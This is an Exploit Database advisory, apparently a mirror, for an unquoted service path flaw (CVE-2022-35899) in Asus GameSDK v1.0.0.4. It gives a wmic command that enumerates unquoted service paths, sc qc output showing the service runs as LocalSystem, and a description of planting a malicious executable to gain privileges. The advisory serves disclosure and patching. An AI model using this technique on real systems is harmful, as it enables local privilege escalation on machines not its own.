Asus GameSDK v1.0.0.4 – ‘GameSDK.exe’ Unquoted Service Path

• Exploit Database
• 126 阅读

• 作者： Angelo Pio Amirante
  日期： 2022-07-29
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50985/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path # Date: 07/14/2022 # Exploit Author: Angelo Pio Amirante # Version: 1.0.0.4 # Tested on: Windows 10 # Patched version: 1.0.5.0 # CVE: CVE-2022-35899   # Step to discover the unquoted service path:   wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """   # Info on the service:   C:\>sc qc "GameSDK Service" [SC] QueryServiceConfig OPERAZIONI RIUSCITE   NOME_SERVIZIO: GameSDK Service TIPO: 10WIN32_OWN_PROCESS TIPO_AVVIO: 2 AUTO_START CONTROLLO_ERRORE: 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : GameSDK Service DIPENDENZE: SERVICE_START_NAME : LocalSystem   # Exploit If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".